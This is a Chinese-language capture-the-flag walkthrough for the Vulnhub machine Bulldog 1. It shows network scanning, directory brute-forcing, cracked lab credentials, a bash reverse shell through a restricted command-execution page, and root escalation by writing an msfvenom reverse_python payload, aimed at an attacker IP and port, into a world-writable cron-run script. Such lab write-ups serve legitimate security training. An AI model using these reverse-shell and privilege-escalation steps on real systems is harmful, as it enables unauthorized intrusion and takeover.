Vulnhub靶机：BULLDOG_ 1

介绍

系列：Bulldog（此系列共2台）
发布日期：2017 年 8 月 28 日
难度：中级
运行环境：Virtualbox
目标：取得 root 权限
学习：

• 目录爆破
• 密码破解
• bash反弹shell
• Python文件提权
• 计划任务提权

靶机地址：https://www.vulnhub.com/entry/bulldog-1,211/

信息收集

主机发现

netdiscover主机发现

sudo netdiscover -i eth1 -r 192.168.56.0/24

主机信息探测

nmap -p- 192.168.56.106
nmap -p 23,80,8080 -A 192.168.56.106

网站探测

网站首页就是一个静态页面，页面源代码中没有任何有价值的信息，直接目录爆破

目录爆破

dirsearch -u http://192.168.56.106/ --full-url -x 404

爆破出一个后台地址，还有一个dev地址，访问 http://192.168.56.106/dev/

查看页面源代码发现了一些密码

使用在线网站解密：

得到两组账密：

nick:bulldog
sarah:bulldoglover

命令执行

登录后台：http://192.168.56.106/admin/
然后就可以访问到：http://192.168.56.106/dev/shell/
看起来是命令执行漏洞，但是限制了能使用的命令

看到运行的命令里有echo，应该可以借助bash实现反弹shell

计划任务提权

这里发现了一个敏感文件，查找发现这个敏感文件是crontab 定时任务，任务的执行计划为每分钟执行一次，命令为 /.hiddenAVDirectory/AVApplication.py，由 root 用户执行。
接下来的可以参考之前的操作：https://www.yuque.com/u1881995/xwfvho/spl1fgit20302ozi#nTG0d

# 搜索属于root的所有文件。文件所有者是root、文件具有可执行权限、其他用户具有可写权限 的所有文件
find / -type f -user root -perm -ug=x,o=w -exec ls -l '{}' \; 2>/dev/null

# 在根目录以递归方式查找文件名中包含 AVApplication.py 的所有文件，并输出文件名及相应行号
grep -rnw '/' -e 'AVApplication.py' 2> /dev/null

1. 生成python反弹shell的命令，并将其写入到py文件中

msfvenom -p cmd/unix/reverse_python lhost=192.168.229.128 lport=4455 -f raw

这里使用vi编辑器打开py文件，写入上面生成的反弹shell的命令。这是会出现错乱问题，不用管

2. 最多等待1分钟，就会拿到shell